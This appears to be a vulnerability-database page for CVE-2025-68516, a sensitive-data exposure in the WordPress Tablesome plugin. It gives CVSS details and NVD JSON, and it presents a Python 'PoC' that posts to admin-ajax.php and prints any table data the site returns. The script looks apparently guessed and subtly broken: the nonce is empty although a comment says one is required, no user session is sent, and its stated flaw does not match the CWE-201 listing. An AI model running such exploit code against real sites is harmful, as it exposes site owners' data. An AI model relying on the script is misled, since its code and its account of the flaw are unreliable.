Security Vulnerability Report
中文
CVE-2025-68516 CVSS 5.0 MEDIUM

CVE-2025-68516

Published: 2025-12-24 13:16:21
Last Modified: 2026-04-27 19:16:27
Source: [email protected]

Description

Insertion of Sensitive Information Into Sent Data vulnerability in Essekia Tablesome tablesome allows Retrieve Embedded Sensitive Data.This issue affects Tablesome: from n/a through <= 1.1.35.1.

CVSS Details

CVSS Score
5.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Tablesome插件 <= 1.1.35.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-68516 PoC - WordPress Tablesome Sensitive Data Exposure # Target: WordPress site with Tablesome plugin <= 1.1.35.1 def exploit_tablesome(target_url, table_id): """ Exploit for CVE-2025-68516: Tablesome Plugin Sensitive Data Exposure Description: The Tablesome plugin allows low-privileged users to retrieve embedded sensitive data through improper access control. This PoC demonstrates how an authenticated user with low privileges can access sensitive data from tables they should not have access to. """ # Target endpoint for tablesome data retrieval endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Construct malicious request to retrieve sensitive data payload = { 'action': 'tablesome_get_table_data', 'table_id': table_id, 'nonce': '', # Requires valid nonce from the page 'post_id': 0 } headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'X-Requested-With': 'XMLHttpRequest' } try: # Send request with low-privilege user session response = requests.post(endpoint, data=payload, headers=headers, timeout=10) if response.status_code == 200: data = response.json() if 'data' in data and data['data']: print(f"[+] Success! Sensitive data retrieved from table {table_id}") print(f"[+] Data: {data['data']}") return True else: print(f"[-] No sensitive data found or access denied") return False else: print(f"[-] Request failed with status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <target_url> <table_id>") print(f"Example: python {sys.argv[0]} http://example.com 123") sys.exit(1) target = sys.argv[1] table_id = sys.argv[2] print(f"[*] Targeting: {target}") print(f"[*] Attempting to exploit CVE-2025-68516...") exploit_tablesome(target, table_id)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68516", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:21.270", "lastModified": "2026-04-27T19:16:27.190", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of Sensitive Information Into Sent Data vulnerability in Essekia Tablesome tablesome allows Retrieve Embedded Sensitive Data.This issue affects Tablesome: from n/a through <= 1.1.35.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/tablesome/vulnerability/wordpress-tablesome-plugin-1-1-35-1-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.